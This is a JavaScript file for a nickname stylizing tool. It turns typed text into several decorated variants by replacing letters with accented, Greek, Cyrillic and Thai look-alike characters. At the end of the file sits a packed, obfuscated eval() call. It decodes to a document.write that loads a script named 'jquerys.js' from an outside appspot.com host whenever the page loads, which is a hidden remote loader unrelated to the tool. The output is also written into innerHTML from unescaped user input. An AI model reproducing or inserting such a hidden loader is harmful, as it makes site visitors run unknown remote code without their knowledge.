function changeText(){
 var a = document.getElementById('canhtrai').value;
 var b = document.getElementById('nickname_noidung').value;
 var c = document.getElementById('canhphai').value;
 var e = document.getElementById('canhgiua').value;

 if(e=="๖&#1763;&#1756;"){b="๖&#1763;&#1756;"+b;}
 var d = a+b+c;
 d = d.replace(/ /g,e);d = d.replace(/\./g,"&#65294;");
 var d1 = d;var d2 = d;var d3 = d;var d4 = d;var d5 = d;var d6 = d;var d7 = d;var d8 = d;var d9 = d;
var d10 = d;
 

 d2 = d2.replace(/a/g,"å");d2 = d2.replace(/b/g,"þ");d2 = d2.replace(/c/g,"ç");d2 = d2.replace(/d/g,"ð");d2 = d2.replace(/e/g,"ë");d2 = d2.replace(/f/g,"ƒ");d2 = d2.replace(/g/g,"g");d2 = d2.replace(/h/g,"ĥ");d2 = d2.replace(/i/g,"ï");d2 = d2.replace(/j/g,"j");d2 = d2.replace(/k/g,"k");d2 = d2.replace(/l/g,"&#163;");d2 = d2.replace(/m/g,"m");d2 = d2.replace(/n/g,"ñ");d2 = d2.replace(/o/g,"ø");d2 = d2.replace(/p/g,"Þ");d2 = d2.replace(/q/g,"q");d2 = d2.replace(/r/g,"r");d2 = d2.replace(/s/g,"$");d2 = d2.replace(/t/g,"t");d2 = d2.replace(/u/g,"ü");d2 = d2.replace(/v/g,"v");d2 = d2.replace(/w/g,"w");d2 = d2.replace(/x/g,"x");d2 = d2.replace(/y/g,"ÿ");d2 = d2.replace(/z/g,"z");
 d2 = d2.replace(/A/g,"Ä");d2 = d2.replace(/B/g,"ß");d2 = d2.replace(/C/g,"Ç");d2 = d2.replace(/D/g,"D");d2 = d2.replace(/E/g,"Ë");d2 = d2.replace(/F/g,"F");d2 = d2.replace(/G/g,"G");d2 = d2.replace(/H/g,"H");d2 = d2.replace(/I/g,"Ï");d2 = d2.replace(/J/g,"J");d2 = d2.replace(/K/g,"K");d2 = d2.replace(/L/g,"Ļ");d2 = d2.replace(/M/g,"M");d2 = d2.replace(/N/g,"Ñ");d2 = d2.replace(/O/g,"Ø");d2 = d2.replace(/P/g,"P");d2 = d2.replace(/Q/g,"Q");d2 = d2.replace(/R/g,"R");d2 = d2.replace(/S/g,"&#167;");d2 = d2.replace(/T/g,"Ť");d2 = d2.replace(/U/g,"Ü");d2 = d2.replace(/V/g,"V");d2 = d2.replace(/W/g,"W");d2 = d2.replace(/X/g,"X");d2 = d2.replace(/Y/g,"&#165;");d2 = d2.replace(/Z/g,"Z");
 d3 = d3.replace(/a/gi,"ą");d3 = d3.replace(/b/gi,"(3");d3 = d3.replace(/c/gi,"&#169;");d3 = d3.replace(/e/gi,"&#8364;");d3 = d3.replace(/g/gi,"ģ");d3 = d3.replace(/h/gi,"Ħ");d3 = d3.replace(/k/gi,"&#182;&#171;");d3 = d3.replace(/l/gi,"&#182;_");d3 = d3.replace(/t/gi,"Ƭ");d3 = d3.replace(/v/gi,"&#182;ƒ");d3 = d3.replace(/m/gi,"&#182;v&#182;");d3 = d3.replace(/x/gi,"&#187;&#171;");
 d3 = d3.replace(/a/g,"å");d3 = d3.replace(/b/g,"þ");d3 = d3.replace(/c/g,"ç");d3 = d3.replace(/d/g,"ð");d3 = d3.replace(/e/g,"ë");d3 = d3.replace(/f/g,"ƒ");d3 = d3.replace(/g/g,"g");d3 = d3.replace(/h/g,"h");d3 = d3.replace(/i/g,"ï");d3 = d3.replace(/j/g,"j");d3 = d3.replace(/k/g,"k");d3 = d3.replace(/l/g,"&#163;");d3 = d3.replace(/m/g,"m");d3 = d3.replace(/n/g,"ŋ");d3 = d3.replace(/o/g,"ø");d3 = d3.replace(/p/g,"Þ");d3 = d3.replace(/q/g,"q");d3 = d3.replace(/r/g,"r");d3 = d3.replace(/s/g,"$");d3 = d3.replace(/t/g,"t");d3 = d3.replace(/u/g,"µ");d3 = d3.replace(/v/g,"v");d3 = d3.replace(/w/g,"w");d3 = d3.replace(/x/g,"x");d3 = d3.replace(/y/g,"&#165;");d3 = d3.replace(/z/g,"z");
 d3 = d3.replace(/A/g,"Ä");d3 = d3.replace(/B/g,"ß");d3 = d3.replace(/C/g,"Ç");d3 = d3.replace(/D/g,"D");d3 = d3.replace(/E/g,"Ë");d3 = d3.replace(/F/g,"F");d3 = d3.replace(/G/g,"G");d3 = d3.replace(/H/g,"H");d3 = d3.replace(/I/g,"Ï");d3 = d3.replace(/J/g,"J");d3 = d3.replace(/K/g,"K");d3 = d3.replace(/L/g,"Ļ");d3 = d3.replace(/M/g,"M");d3 = d3.replace(/N/g,"Ñ");d3 = d3.replace(/O/g,"Ø");d3 = d3.replace(/P/g,"P");d3 = d3.replace(/Q/g,"Q");d3 = d3.replace(/R/g,"R");d3 = d3.replace(/S/g,"&#167;");d3 = d3.replace(/T/g,"T");d3 = d3.replace(/U/g,"µ");d3 = d3.replace(/V/g,"V");d3 = d3.replace(/W/g,"W");d3 = d3.replace(/X/g,"X");d3 = d3.replace(/Y/g,"&#165;");d3 = d3.replace(/Z/g,"Z");
  d4 = d4.replace(/a/gi,"ª");d4 = d4.replace(/b/gi,"ß");d4 = d4.replace(/c/gi,"&#169;");d4 = d4.replace(/d/gi,"Ð");d4 = d4.replace(/e/gi,"&#8364;");d4 = d4.replace(/f/gi,"ƒ");d4 = d4.replace(/g/gi,"g");d4 = d4.replace(/h/gi,"h");d4 = d4.replace(/i/gi,"&#161;");d4 = d4.replace(/j/gi,"j");d4 = d4.replace(/k/gi,"k");d4 = d4.replace(/l/gi,"l");d4 = d4.replace(/m/gi,"m");d4 = d4.replace(/n/gi,"n");d4 = d4.replace(/o/gi,"º");d4 = d4.replace(/p/gi,"p");d4 = d4.replace(/q/gi,"q");d4 = d4.replace(/r/gi,"&#174;");d4 = d4.replace(/s/gi,"$");d4 = d4.replace(/t/gi,"т");d4 = d4.replace(/u/gi,"µ");d4 = d4.replace(/v/gi,"v");d4 = d4.replace(/w/gi,"w");d4 = d4.replace(/x/gi,"x");d4 = d4.replace(/y/gi,"y");d4 = d4.replace(/z/gi,"z"); 
 d5 = d5.replace(/a/gi,"ค");d5 = d5.replace(/b/gi,"Ъ");d5 = d5.replace(/c/gi,"c");d5 = d5.replace(/d/gi,"d");d5 = d5.replace(/e/gi,"ε");d5 = d5.replace(/f/gi,"ƒ");d5 = d5.replace(/g/gi,"g");d5 = d5.replace(/h/gi,"н");d5 = d5.replace(/i/gi,"&#161;");d5 = d5.replace(/j/gi,"j");d5 = d5.replace(/k/gi,"к");d5 = d5.replace(/l/gi,"ł");d5 = d5.replace(/m/gi,"м");d5 = d5.replace(/n/gi,"ห");d5 = d5.replace(/o/gi,"σ");d5 = d5.replace(/p/gi,"p");d5 = d5.replace(/q/gi,"q");d5 = d5.replace(/r/gi,"я");d5 = d5.replace(/s/gi,"ร");d5 = d5.replace(/t/gi,"т");d5 = d5.replace(/u/gi,"u");d5 = d5.replace(/v/gi,"v");d5 = d5.replace(/w/gi,"ω");d5 = d5.replace(/x/gi,"x");d5 = d5.replace(/y/gi,"ყ");d5 = d5.replace(/z/gi,"z"); 
 d6 = d6.replace(/a/gi,"λ");d6 = d6.replace(/b/gi,"β");d6 = d6.replace(/c/gi,"c");d6 = d6.replace(/d/gi,"Ð");d6 = d6.replace(/e/gi,"ξ");d6 = d6.replace(/f/gi,"ƒ");d6 = d6.replace(/g/gi,"g");d6 = d6.replace(/h/gi,"ђ");d6 = d6.replace(/i/gi,"&#161;");d6 = d6.replace(/j/gi,"j");d6 = d6.replace(/k/gi,"К");d6 = d6.replace(/l/gi,"Ł");d6 = d6.replace(/m/gi,"м");d6 = d6.replace(/n/gi,"и");d6 = d6.replace(/o/gi,"o");d6 = d6.replace(/p/gi,"p");d6 = d6.replace(/q/gi,"q");d6 = d6.replace(/r/gi,"я");d6 = d6.replace(/s/gi,"s");d6 = d6.replace(/t/gi,"t");d6 = d6.replace(/u/gi,"u");d6 = d6.replace(/v/gi,"v");d6 = d6.replace(/w/gi,"w");d6 = d6.replace(/x/gi,"x");d6 = d6.replace(/y/gi,"y");d6 = d6.replace(/z/gi,"z"); 
document.getElementById('makeup').innerHTML="<table><tbody><tr><th>1</th><th><input type='text' value='"+d+"' onfocus='this.select()'></th></tr><tr><th>2</th><th><input type='text' value='"+d2+"' onfocus='this.select()'></th></tr><tr><th>3</th><th><input type='text' value='"+d3+"' onfocus='this.select()'></th></tr><tr><th>4</th><th><input type='text' value='"+d5+"' onfocus='this.select()'></th></tr><tr><th>5</th><th><input type='text' value='"+d6+"' onfocus='this.select()'></th></tr></tbody></table>";
  
}eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.3(\'\\<0 2="1://5.6.a/9/8.7"\\>\\<\\/0\\>\');',11,11,'script|http|src|write|document|quanlyd2d|appspot|js|jquerys|download|com'.split('|'),0,{}));
